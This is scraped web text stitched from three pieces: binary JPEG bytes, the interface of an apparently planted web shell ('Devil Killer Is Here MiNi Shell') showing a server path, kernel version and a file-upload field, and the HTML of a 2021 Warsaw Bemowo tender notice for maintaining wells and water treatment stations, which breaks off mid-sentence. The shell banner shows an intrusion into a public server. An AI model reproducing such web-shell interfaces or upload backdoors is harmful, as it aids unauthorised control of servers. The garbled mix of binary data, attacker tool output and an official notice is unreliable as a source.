JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210827/0016221601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja studni i stacji uzdatniania wody na terenie m.st. Warszawy Dzielnicy Bemowo w latach 2022-2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA Dzielnica Bemowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Śląskich 70</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-381</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bemowo.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bemowo.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja studni i stacji uzdatniania wody na terenie m.st. Warszawy Dzielnicy Bemowo w latach 2022-2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a11d3e72-0702-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00162216</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002146/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Konserwacja studni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;•komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;•<br/>Zainstalowanaprzeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google<br/>Chrome lub MSEdge;• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf;• Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;•<br/>Dopuszczalne formatyplików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg,<br/>jpeg, tif, tiff, geotiff, png,svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip,<br/>7z, html, xhtml, css, xml,xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc• Plik<br/>załączony i zapisany przezWykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwośćotworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminuskładania ofert;• Oznaczenie czasu odbioru danych przez Platformę<br/>stanowi datę oraz dokładny czas(hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego odpowiednim źródłemczasu - zegarem Głównego Urzędu Miar.1. W przypadku<br/>składania wniosku lub oferty w formieelektronicznej (podpisywania dokumentów kwalifikowanym<br/>podpisem elektronicznym), Wykonawcamusi posiadać:• Kwalifikowany podpis elektroniczny osoby<br/>składającej wniosek lub ofertę w Systemie;•Włączona w przeglądarce obsługa JavaScript;•<br/>Zainstalowane na komputerze środowiskouruchomieniowe ORACLE JAVA (dla systemu Windows - w<br/>wersji 32 oraz 64 bitowej – do pobrania zestrony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline orazWindowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)•Zainstalowana aplikacja Szafir Host• Podłączony lub wbudowany w<br/>komputer czytnik kart podpisuelektronicznego. Prawidłowość zainstalowania w/w komponentów można<br/>zweryfikować po zalogowaniudo OnePlace, po kliknięciu przycisku „SPRAWDŹ PODPIS”.c.d w tabeli<br/>zamieszczonej w Rozdziale IX SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-I-WZP.271.34.2021.APO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje stałą konserwację studni wraz ze stacjami uzdatniania wody <br/>i punktami czerpalnymi w latach 2022-2024, polegającą na wykonywaniu czynności niezbędnych do utrzymania urządzeń w stanie technicznym umożliwiającym bezpieczną ich eksploatację na terenie m.st. Warszawy Dzielnicy Bemowo przy ul. Obrońców Tobruku, ul. Kazubów, ul. Morcinka i punkt czerpalny Morcinka bis, ul. Czerwonych Maków ul. Pełczyńskiego, ul. Szobera, <br/>ul. Bolimowskiej, ul. Westerplatte, ul. Radiowej; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">65130000-3 - Obsługa stacji wody</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50511000-0 - Usługi w zakresie napraw i konserwacji pomp</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający gwarantuje realizację przedmiotu umowy w zakresie pkt 1 Opisu Przedmiotu zamówienia. Zamawiający wprowadza prawo opcji, zgodnie z którym Wykonawca w okresie obowiązywania umowy, w przypadku zaistnienia konieczności, realizować będzie w ujęciach wody prace polegające na wykonywaniu napraw, których Zamawiający nie mógł przewidzieć na etapie sporządzania SWZ, (tj. napraw nie ujętych w pkt 1 Opisu przedmiotu zamówienia), w szczególności: wymiana wodomierzy, manometrów, inżektorów, zaworów w obrębie stacji uzdatniania wody, wymiana stłuczonych szyb, odmalowanie ścian/elewacji ujęć wody, uzupełnienie tynków, udrażnianie rurociągu, naprawa koryta itp.<br/>1)	Zamawiający skorzysta z prawa opcji w przypadku posiadania środków finansowych.<br/>2)	Zamówienie w ramach prawa opcji określone w pkt 2 ppkt 2.2. nie stanowi zobowiązania Zamawiającego do jego udzielenia, jak również nie stanowi podstawy do dochodzenia przez Wykonawcę roszczeń odszkodowawczych z tytułu niezrealizowania tego zamówienia.<br/> Prace wymienione w pkt 2 ppkt 2.2. będą wykonywane w następujący sposób:<br/>1)	Wykonawca zgłosi pisemnie/mailowo konieczność wykonania prac niezwłocznie po ich stwierdzeniu, tj. nie później niż w ciągu 2 (słownie: dwóch) dni roboczych od dnia stwierdzenia konieczności – przekaże Zamawiającemu protokół konieczności prac wraz z przewidywanym kosztorysem,<br/>2)	Zamawiający dokona analizy kosztów i zasadności realizacji prac naprawczych,<br/>3)	po uznaniu zasadności realizacji prac naprawczych oraz zatwierdzeniu kosztorysu Zamawiający wezwie Wykonawcę do podjęcia czynności naprawczych,<br/>4)	Wykonawca przystąpi do realizacji prac niezwłocznie po otrzymaniu wezwania od Zamawiającego drogą pisemną/mailową. Poprzez stwierdzenie „niezwłocznie” Zamawiający rozumie: w ciągu 2 (słownie: dwóch) dni roboczych od dnia uzyskania akceptacji Zamawiającego. W przypadku konieczności pozyskania niezbędnych materiałów/elementów/urządzeń czas przystąpienia do czynności naprawczych wydłuża się o okres oczekiwania na materiały/elementy/urządzenia po udokumentowaniu okresu oczekiwania.<br/>5)	każdorazowe zakończenie prac Wykonawca niezwłocznie, tj. bezpośrednio po zakończeniu czynności naprawczych, zgłosi pisemnie/mailowo Zamawiającemu, <br/>6)	każdorazowo po zakończeniu prac zostanie spisany protokół odbioru prac,<br/>7)	Zamawiający zapłaci wynagrodzenie Wykonawcy na podstawie zaakceptowanego przez Zamawiającego protokołu odbioru prac wraz z jego kosztorysem.<br/>Zakupu nowego materiału/elementu/urządzenia należy dokonywać po możliwie najniższych cenach, przy zachowaniu właściwej jakości i standardów techniczno-eksploatacyjnych. Koszty materiałów eksploatacyjnych/elementów niezbędnych do realizacji zamówienia w ramach prawa opcji mieszczą się w wynagrodzeniu określonym <br/>w § 6 ust. 4 niniejszej umowy. <br/>Na wykonanie prac wymienionych w pkt 2 ppkt 2.2. Opisu przedmiotu zamówienia <br/>w ramach prawa opcji, Zamawiający zamierza przeznaczyć kwotę wskazaną w § 6 ust. 4 niniejszej umowy, tj. w wysokości nieprzekraczającej 180 000,00 PLN brutto (słownie złotych: sto osiemdziesiąt tysięcy, 00/100) na cały okres trwania umowy tj. 36 miesięcy, maksymalnie 60 000,00 PLN brutto (słownie złotych: sześćdziesiąt tysięcy, 00/100) na rok. W przypadku braku środków Zamawiający nie skorzysta z prawa opcji. <br/>2.6. Wykonawca obowiązany jest do prowadzenia rejestru prac wymienionych w pkt 2 <br/>ppkt. 2.2. wykraczających poza czynności konserwacji wskazane w pkt 1 Opisu przedmiotu zamówienia, w którym będzie odnotowywał czas i miejsce interwencji, rodzaj podjętych prac oraz ilość i rodzaj wymienionych na nowe materiałów/elementów/urządzeń. Rejestr może być prowadzony w dowolnej formie, w taki jednak sposób, aby mógł być przedstawiony Zamawiającemu do kontroli na koniec każdego miesiąca przy fakturze VAT za konserwację oraz w każdym innym momencie na żądanie Zamawiającego, w związku <br/>z czym preferowaną jest forma elektroniczna pozwalająca na przesłanie rejestru pocztą elektroniczną. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-12-01 do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Każda z ofert będzie oceniana wg powyższych kryteriów zgodnie z poniższym wzorem:<br/> P = P(C) + P(CR)<br/>gdzie:<br/>P – łączna liczba punktów<br/>P(C) – liczba punktów w kryterium „cena oferty brutto”<br/>P(CR) – liczba punktów w kryterium „czas przystąpienia do usunięci awarii”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje stałą konserwację studni wraz ze stacjami uzdatniania wody <br/>i punktami czerpalnymi w latach 2022-2024, polegającą na wykonywaniu czynności niezbędnych do utrzymania urządzeń w stanie technicznym umożliwiającym bezpieczną ich eksploatację na terenie m.st. Warszawy Dzielnicy Bemowo przy ul. Anieli Krzywoń, ul. Sterniczej/Powstańców Śląskich, ul. Sucharskiego, ul. Muszlowej, ul. Rozłogi 2a, ul. Rozłogi 12a, ul. Raginisa/ Borowego, ul. Sterniczej 125, ul. Wyki. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">65130000-3 - Obsługa stacji wody</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50511000-0 - Usługi w zakresie napraw i konserwacji pomp</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający gwarantuje realizację przedmiotu umowy w zakresie pkt 1 Opisu Przedmiotu zamówienia. Zamawiający wprowadza prawo opcji, zgodnie z którym Wykonawca w okresie obowiązywania umowy, w przypadku zaistnienia konieczności, realizować będzie w ujęciach wody prace polegające na wykonywaniu napraw, których Zamawiający nie mógł przewidzieć na etapie sporządzania SWZ, (tj. napraw nie ujętych w pkt 1 Opisu przedmiotu zamówienia), w szczególności: wymiana wodomierzy, manometrów, inżektorów, zaworów w obrębie stacji uzdatniania wody, wymiana stłuczonych szyb, odmalowanie ścian/elewacji ujęć wody, uzupełnienie tynków, udrażnianie rurociągu, naprawa koryta itp.<br/>1)	Zamawiający skorzysta z prawa opcji w przypadku posiadania środków finansowych.<br/>2)	Zamówienie w ramach prawa opcji określone w pkt 2 ppkt 2.2. nie stanowi zobowiązania Zamawiającego do jego udzielenia, jak również nie stanowi podstawy do dochodzenia przez Wykonawcę roszczeń odszkodowawczych z tytułu niezrealizowania tego zamówienia.<br/> Prace wymienione w pkt 2 ppkt 2.2. będą wykonywane w następujący sposób:<br/>1)	Wykonawca zgłosi pisemnie/mailowo konieczność wykonania prac niezwłocznie po ich stwierdzeniu, tj. nie później niż w ciągu 2 (słownie: dwóch) dni roboczych od dnia stwierdzenia konieczności – przekaże Zamawiającemu protokół konieczności prac wraz z przewidywanym kosztorysem,<br/>2)	Zamawiający dokona analizy kosztów i zasadności realizacji prac naprawczych,<br/>3)	po uznaniu zasadności realizacji prac naprawczych oraz zatwierdzeniu kosztorysu Zamawiający wezwie Wykonawcę do podjęcia czynności naprawczych,<br/>4)	Wykonawca przystąpi do realizacji prac niezwłocznie po otrzymaniu wezwania od Zamawiającego drogą pisemną/mailową. Poprzez stwierdzenie „niezwłocznie” Zamawiający rozumie: w ciągu 2 (słownie: dwóch) dni roboczych od dnia uzyskania akceptacji Zamawiającego. W przypadku konieczności pozyskania niezbędnych materiałów/elementów/urządzeń czas przystąpienia do czynności naprawczych wydłuża się o okres oczekiwania na materiały/elementy/urządzenia po udokumentowaniu okresu oczekiwania.<br/>5)	każdorazowe zakończenie prac Wykonawca niezwłocznie, tj. bezpośrednio po zakończeniu czynności naprawczych, zgłosi pisemnie/mailowo Zamawiającemu, <br/>6)	każdorazowo po zakończeniu prac zostanie spisany protokół odbioru prac,<br/>7)	Zamawiający zapłaci wynagrodzenie Wykonawcy na podstawie zaakceptowanego przez Zamawiającego protokołu odbioru prac wraz z jego kosztorysem.<br/>Zakupu nowego materiału/elementu/urządzenia należy dokonywać po możliwie najniższych cenach, przy zachowaniu właściwej jakości i standardów techniczno-eksploatacyjnych. Koszty materiałów eksploatacyjnych/elementów niezbędnych do realizacji zamówienia w ramach prawa opcji mieszczą się w wynagrodzeniu określonym <br/>w § 6 ust. 4 niniejszej umowy. <br/>Na wykonanie prac wymienionych w pkt 2 ppkt 2.2. Opisu przedmiotu zamówienia <br/>w ramach prawa opcji, Zamawiający zamierza przeznaczyć kwotę wskazaną w § 6 ust. 4 niniejszej umowy, tj. w wysokości nieprzekraczającej 180 000,00 PLN brutto (słownie złotych: sto osiemdziesiąt tysięcy, 00/100) na cały okres trwania umowy tj. 36 miesięcy, maksymalnie 60 000,00 PLN brutto (słownie złotych: sześćdziesiąt tysięcy, 00/100) na rok. W przypadku braku środków Zamawiający nie skorzysta z prawa opcji. <br/>2.6. Wykonawca obowiązany jest do prowadzenia rejestru prac wymienionych w pkt 2 <br/>ppkt. 2.2. wykraczających poza czynności konserwacji wskazane w pkt 1 Opisu przedmiotu zamówienia, w którym będzie odnotowywał czas i miejsce interwencji, rodzaj podjętych prac oraz ilość i rodzaj wymienionych na nowe materiałów/elementów/urządzeń. Rejestr może być prowadzony w dowolnej formie, w taki jednak sposób, aby mógł być przedstawiony Zamawiającemu do kontroli na koniec każdego miesiąca przy fakturze VAT za konserwację oraz w każdym innym momencie na żądanie Zamawiającego, w związku <br/>z czym preferowaną jest forma elektroniczna pozwalająca na przesłanie rejestru pocztą elektroniczną. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-12-01 do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Każda z ofert będzie oceniana wg powyższych kryteriów zgodnie z poniższym wzorem:<br/> P = P(C) + P(CR)<br/>gdzie:<br/>P – łączna liczba punktów<br/>P(C) – liczba punktów w kryterium „cena oferty brutto”<br/>P(CR) – liczba punktów w kryterium „czas przystąpienia do usunięci awarii”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu o udzielenie zamówienia może wziąć udział Wykonawca, który spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej.<br/>Warunek udziału w postępowaniu, o którym mowa w ust. 1 zostanie uznany za spełniony, jeżeli Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje w sposób należyty, co najmniej jedną usługę odpowiadającą przedmiotowi zamówienia, tj:<br/>•	dla części zamówienia 